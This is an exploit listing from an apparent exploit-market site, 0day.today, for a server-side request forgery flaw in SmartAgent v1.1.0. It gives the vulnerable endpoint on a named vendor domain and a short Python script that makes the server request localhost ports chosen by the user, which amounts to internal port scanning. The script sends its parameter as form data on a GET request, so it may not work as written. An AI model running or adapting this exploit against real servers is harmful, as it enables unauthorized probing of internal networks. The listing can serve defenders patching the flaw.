[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SmartAgent 1.1.0 Server-Side Request Forgery Vulnerability

Author
Alter Prime
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39804
Category
web applications
Date add
06-11-2024
Platform
php
# Exploit Title: SmartAgent v1.1.0 - Server-Side Request Forgery (SSRF)
# Exploit Author: Alter Prime
# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com
# Version: Build v1.1.0
# Tested on: Kali Linux

An unauthenticated user can trigger the web server to perform web requests to the localhost via a GET request to the vulnerable script  https://smarts-srlcom.com/FB/getFbVideoSource.php?url=http://127.0.0.1:80.

The GET request includes the vulnerable parameter "url".


Steps To Reproduce:
1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0


#Python Exploit

import requests

url = "https://smartagent.[client].com/FB/getFbVideoSource.php"
port = input("Enter the port you want to check: ")

parameter = {
  "url": "http://127.0.0.1:" + port
}

response = requests.get(url, data=parameter, verify=False)

if response.status_code == 200:
    print(f"Port {port} is open on the server")
else:
    print(f"Port {port} closed")

#  0day.today [2024-12-23]  #